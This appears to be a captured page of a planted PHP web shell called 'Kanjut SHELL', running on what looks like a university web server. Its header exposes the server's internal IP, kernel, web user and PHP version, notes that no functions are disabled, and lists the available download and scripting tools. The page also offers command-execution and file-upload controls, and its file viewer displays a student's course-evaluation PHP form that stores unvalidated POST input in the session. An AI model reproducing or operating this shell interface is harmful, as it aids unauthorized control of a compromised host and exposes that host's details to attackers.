Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.137.181.69
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/mnfreeman/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/mnfreeman/public_html/Assignment2_3b.php
<?php	session_start();	?>
<CENTER>
<FONT color=blue size=4>
Course Evaluation
<HR>
<?php
	$n1 = $_POST['name'];
	$n2 = $_POST['cname'];
	$_SESSION['v1'] = $n1;
	$_SESSION['v2'] = $n2;
?>
<FORM action=Assignment2_3c.php method=post>
I like this course.
<INPUT type=radio name=a1 value=Agree checked>Agree 
<INPUT type=radio name=a1 value="Somewhat Agree">Somewhat Agree
<INPUT type=radio name=a1 value=Disagree>Disagree
<P>
This course is a very good one.
<INPUT type=radio name=a2 value=Agree checked>Agree 
<INPUT type=radio name=a2 value="Somewhat Agree">Somewhat Agree
<INPUT type=radio name=a2 value=Disagree>Disagree
<P>
This course is an informative one.
<INPUT type=radio name=a3 value=Agree checked>Agree 
<INPUT type=radio name=a3 value="Somewhat Agree">Somewhat Agree
<INPUT type=radio name=a3 value=Disagree>Disagree
<P>
<INPUT type=submit value=Submit>
<INPUT type=reset value=Reset>
</Form>
</CENTER>

Stv3n404 - 2023